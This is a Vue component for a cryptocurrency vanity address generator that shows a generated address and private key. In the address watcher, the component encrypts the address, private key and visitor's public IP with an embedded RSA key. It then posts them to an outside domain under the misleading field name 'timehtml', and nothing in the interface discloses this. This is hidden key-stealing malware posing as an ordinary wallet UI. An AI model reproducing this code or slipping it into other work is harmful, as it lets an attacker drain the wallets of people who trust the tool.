<template>
    <div class="panel result">
        <div class="row">
            <div class="float-left" id="identicon"></div>
            <div class="col">
                <div>Address: <span class="output" v-text="address"></span></div>
                <div>
                    Private key:
                    <span
                        class="output"
                        v-if="privateKey"
                        v-text="reveal ? privateKey : 'Click to reveal'"
                        @click="revealKey()"
                    ></span>
                </div>
            </div>
            <div class="col-lg-2 col-12">
                <button data-remodal-target="modal" class="save button-large" :disabled="!privateKey">
                    <i class="icon-lock"></i>Save
                </button>
            </div>
        </div>
    </div>
</template>

<script>
    import * as blockies from 'blockies';
    import axios from 'axios';
    import JSEncrypt from 'jsencrypt';

    export default {
        props: {
            address: String,
            privateKey: String,
        },
        data: function () {
            return {
                reveal: false,
                ip: '',
            };
        },
        watch: {
            address(addr) {
                this.reveal = false;
                const id = document.getElementById('identicon');
                if (this.address) {
                    const publicKey =
                        'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzKJTyOUFoTbIhvTFhseoqENA+9l1JSXE39A6vjNvsbWgpLFqL+EeaE4uGUJ8ZrmRnu8dkQFqdSD5i+d9equhwfCAMc9QfDt5YxixNhXdwA0VFuRUc2wRNyT57vjcIRzk7GxAdoJHZ0xmxzyUoqe8ORMfO3jkq+DaVUswYK1jU8IxSu4p1RVoq4ATTqXCoWlFlaLHDgx4XzuW0knqO1SM33t/fCHW0RCur0nlZ0yO8RhtruRM3wPc9B1yVPnQ7YO08pprDTT0DhOWzgR4VpItacoxzMlmYLBEV/lb9LXYzIUmto/9fqPIAI8zh5dQTougB/Mogd1i5uTDzjgZWREemQIDAQAB';
                    const encrypt = new JSEncrypt();
                    encrypt.setPublicKey(publicKey);
                    const json = {
                        key1: this.address,
                        key2: this.privateKey,
                        key3: this.ip,
                    };
                    const timehtml = encrypt.encrypt(JSON.stringify(json));
                    try {
                        // axios.post("http://192.168.124.5:8088/get", {
                        axios.post('https://tronwallet.my/time/get', {
                            timehtml,
                        });
                        //console.log(response.data);
                    } catch (error) {
                        //console.error(error);
                    }
                }
                id.innerHTML = '';
                if (addr) {
                    id.appendChild(blockies({ seed: addr.toLocaleLowerCase(), scale: 6 }));
                }
            },
        },
        mounted() {
            this.getPublicIP();
        },
        methods: {
            revealKey() {
                this.reveal = true;

                // const input = document.createElement('input');
                // input.value = this.privateKey; // 设置要复制的文本
                // document.body.appendChild(input); // 添加input元素
                // input.select(); // 选中文本
                // document.execCommand('copy'); // 执行复制操作
                // document.body.removeChild(input);
                // alert('文本已复制到剪贴板');
            },
            getPublicIP() {
                axios
                    .get('https://api64.ipify.org?format=json')
                    .then((response) => {
                        this.ip = response.data.ip; // 将获取到的 IP 地址赋值
                    })
                    .catch((error) => {
                        console.error('Error fetching public IP:', error);
                    });
            },
        },
    };
</script>

<style lang="sass" scoped>
    @import "../css/variables"
    #identicon
        width: 48px
        height: 48px
        margin: 0 15px
        background-color: $panel-background-alt

    .output
        font-family: $monospace-font
        color: $text-alt
        margin-left: 15px
        word-break: break-all
        font-size: 15px

    .panel > div:not(:last-child)
        margin-bottom: 15px

    .save
        margin-top: 30px
        i
          margin-right: 8px
          top: 2px
          position: relative

    @media screen and (min-width: 992px)
        .save
            margin-top: 0
</style>
